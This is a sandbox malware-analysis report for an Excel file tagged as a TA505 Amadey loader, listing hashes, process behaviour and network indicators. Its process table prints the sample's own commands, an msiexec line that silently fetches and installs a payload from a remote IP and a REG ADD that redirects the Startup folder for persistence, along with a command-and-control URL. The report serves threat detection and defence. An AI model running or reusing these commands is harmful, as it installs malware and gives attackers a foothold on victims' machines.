analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

6378168E_Factura_FMC1042_20190424.xls

Full analysis: https://app.any.run/tasks/ddbbd5df-4e77-4c57-9db8-faedb243bbea
Verdict: Malicious activity
Threats:

Amadey is a formidable Windows infostealer threat, characterized by its persistence mechanisms, modular design, and ability to execute various malicious tasks.

Analysis date: April 24, 2019, 21:40:10
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
loader
exe-to-msi
trojan
amadey
ta505
Indicators:
MIME: application/vnd.ms-excel
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: Microsoft Office, Last Saved By: 1, Name of Creating Application: Microsoft Excel, Create Time/Date: Wed Dec 19 10:42:12 2018, Last Saved Time/Date: Wed Apr 24 13:57:37 2019, Security: 0
MD5:

D33FD4D91E78F4E4CDA03703159BC37E

SHA1:

D49232D4EB98B5730C895A5F3B1DCAEED89502F0

SHA256:

F7A615EB750B37C381B3D8A563A2D2A810659094E2548FDBA95CED82FA390707

SSDEEP:

3072:tKpb8rGYrMPelwhKmFV5xtezEsgrdgNeEQSNfzAKAn8CsEwF:tKpb8rGYrMPelwhKmFV5xtuEsgrdgNHZ

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Uses Microsoft Installer as loader

      • EXCEL.EXE (PID: 2664)
    • Unusual execution from Microsoft Office

      • EXCEL.EXE (PID: 2664)
    • Changes the Startup folder

      • REG.exe (PID: 3616)
    • Downloads executable files from the Internet

      • msiexec.exe (PID: 2192)
    • Downloads executable files from IP

      • msiexec.exe (PID: 2192)
    • Application was dropped or rewritten from another process

      • cmualrc.exe (PID: 2916)
    • Connects to CnC server

      • cmualrc.exe (PID: 2916)
    • AMADEY was detected

      • cmualrc.exe (PID: 2916)
  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • msiexec.exe (PID: 2192)
      • MSI7370.tmp (PID: 3308)
    • Drop ExeToMSI Application

      • msiexec.exe (PID: 2192)
    • Uses REG.EXE to modify Windows registry

      • cmualrc.exe (PID: 2916)
    • Creates files in the program directory

      • MSI7370.tmp (PID: 3308)
    • Starts itself from another location

      • MSI7370.tmp (PID: 3308)
  • INFO

    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 2664)
    • Writes to a desktop.ini file (may be used to cloak folders)

      • msiexec.exe (PID: 2192)
    • Starts application with an unusual extension

      • msiexec.exe (PID: 2192)
    • Application was dropped or rewritten from another process

      • MSI7370.tmp (PID: 3308)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xls | Microsoft Excel sheet (78.9)

EXIF

FlashPix

Author: Microsoft Office
LastModifiedBy: 1
Software: Microsoft Excel
CreateDate: 2018:12:19 10:42:12
ModifyDate: 2019:04:24 12:57:37
Security: None
CodePage: Windows Cyrillic
Company: Microsoft Corporation
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts:
  • 4
  • OOOO
  • 2
  • 3
HeadingPairs:
  • Листы
  • 2
  • Макросы Excel 4.0
  • 2
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
38
Monitored processes
6
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start excel.exe no specs msiexec.exe no specs msiexec.exe msi7370.tmp #AMADEY cmualrc.exe reg.exe

Process information

PID
CMD
Path
Indicators
Parent process
2664"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /ddeC:\Program Files\Microsoft Office\Office14\EXCEL.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Version:
14.0.6024.1000
2432msiexec.exe STOP=1 /i http://92.38.135.134/dom2 /q ksw='%TEMP%' C:\Windows\system32\msiexec.exeEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Exit code:
0
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
2192C:\Windows\system32\msiexec.exe /VC:\Windows\system32\msiexec.exe
services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows® installer
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
3308"C:\Windows\Installer\MSI7370.tmp"C:\Windows\Installer\MSI7370.tmp
msiexec.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
2916c:\programdata\f64a428dfd\cmualrc.exec:\programdata\f64a428dfd\cmualrc.exe
MSI7370.tmp
User:
admin
Integrity Level:
MEDIUM
3616REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\ProgramData\f64a428dfdC:\Windows\system32\REG.exe
cmualrc.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Registry Console Tool
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
718
Read events
655
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
0
Text files
9
Unknown types
3

Dropped files

PID
Process
Filename
Type
2664EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVR643A.tmp.cvr
MD5:
SHA256:
2192msiexec.exeC:\Users\admin\AppData\Local\Temp\~DF1FA54B7A343D224D.TMP
MD5:
SHA256:
2192msiexec.exeC:\Windows\Installer\107264.ipi
MD5:
SHA256:
2192msiexec.exeC:\Windows\Installer\MSI72D1.tmp
MD5:
SHA256:
2192msiexec.exeC:\Windows\Installer\MSI7370.tmp
MD5:
SHA256:
3308MSI7370.tmpC:\ProgramData\0
MD5:
SHA256:
3308MSI7370.tmpC:\programdata\f64a428dfd\cmualrc.exe:Zone.Identifier
MD5:
SHA256:
2192msiexec.exeC:\Config.Msi\107265.rbs
MD5:
SHA256:
2192msiexec.exeC:\Users\admin\AppData\Local\Temp\~DFC04D7C25D1DEB876.TMP
MD5:
SHA256:
2916cmualrc.exeC:\ProgramData\0
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
2
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2192
msiexec.exe
GET
200
92.38.135.134:80
http://92.38.135.134/dom2
RU
executable
172 Kb
suspicious
2916
cmualrc.exe
POST
200
95.104.121.111:80
http://gohaiendo.com/ppk/index.php
GE
text
6 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2192
msiexec.exe
92.38.135.134:80
RU
suspicious
2916
cmualrc.exe
95.104.121.111:80
gohaiendo.com
Magticom Ltd.
GE
malicious

DNS requests

Domain
IP
Reputation
gohaiendo.com
  • 95.104.121.111
  • 91.104.18.219
  • 181.59.254.21
  • 186.74.208.84
  • 37.152.176.90
  • 197.157.216.75
  • 217.12.199.168
  • 181.39.233.180
  • 194.204.25.137
  • 62.141.241.11
malicious

Threats

PID
Process
Class
Message
2192
msiexec.exe
Misc activity
SUSPICIOUS [PTsecurity] Using msiexec.exe for Downloading non-MSI file
2192
msiexec.exe
Potential Corporate Privacy Violation
POLICY [PTsecurity] Executable application_x-msi Download
2916
cmualrc.exe
A Network Trojan was detected
MALWARE [PTsecurity] Trojan.Win32.Amadey
2916
cmualrc.exe
A Network Trojan was detected
MALWARE [PTsecurity] Trojan.Win32.Amadey
2 ETPRO signatures available at the full report
No debug info